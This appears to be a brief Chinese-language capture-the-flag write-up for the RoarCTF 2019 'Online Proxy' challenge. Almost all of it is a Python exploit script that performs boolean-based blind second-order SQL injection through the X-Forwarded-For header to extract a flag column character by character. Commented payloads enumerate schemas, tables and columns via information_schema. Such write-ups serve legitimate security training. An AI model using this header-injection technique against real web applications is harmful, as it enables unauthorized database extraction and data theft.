[RoarCTF 2019]Online Proxy

这题可还行。
进去看F12,有IP.
知道看了别人的博客才发现有注入。
重复前面的。会把再之前的写入,
执行Sql语句。
直接放exp了:

import requests
import time
url="http://node3.buuoj.cn:27440/"
head={
    "GET" : "/ HTTP/1.1",
    "Cookie":"track_uuid=eddfa360-d3d7-46db-80f0-f42a7d51fa04",
    "X-Forwarded-For":""
}
result=''
urls ="0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"

for i in range(21,100):
    l=1
    r=127
    mid=(l+r)>>1
    while(l<r):
        head["X-Forwarded-For"] = urls.format(i, mid)
        html_0=requests.post(url,headers=head)
        head["X-Forwarded-For"] = urls.format(i, mid+1)
        html_0 = requests.post(url, headers=head)
        html_0 = requests.post(url, headers=head)
        if "Last Ip: 1" in html_0.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    if(chr(mid)==''):
            break
    result+=chr(mid)
    print(result)
print("table_name:"+result)
#urls ="0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
#head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i,mid)
#urls ="0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"

推荐文章